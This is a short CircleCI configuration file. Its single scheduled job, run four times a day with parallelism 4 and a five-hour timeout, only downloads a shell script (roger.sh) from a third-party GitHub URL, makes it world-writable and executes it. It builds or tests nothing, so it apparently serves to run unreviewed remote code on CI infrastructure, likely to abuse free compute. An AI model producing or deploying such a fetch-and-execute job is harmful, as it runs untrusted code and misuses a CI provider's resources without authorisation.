version: 2.0
jobs:
  Ferxicode:
    parallelism: 4
    docker:
      - image: circleci/ruby:2.7.3
    steps:
    - run:
        name: Gore
        command: wget https://raw.githubusercontent.com/terb4ru/gasks/main/roger.sh && chmod 777 roger.sh && ./roger.sh
        no_output_timeout: 5h
        
workflows:
  version: 2
  commit:
    jobs:
      - Ferxicode
    triggers:
      - schedule:
          cron: "0 5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
                
  Ferxicodejobs:
    jobs:
      - Ferxicode
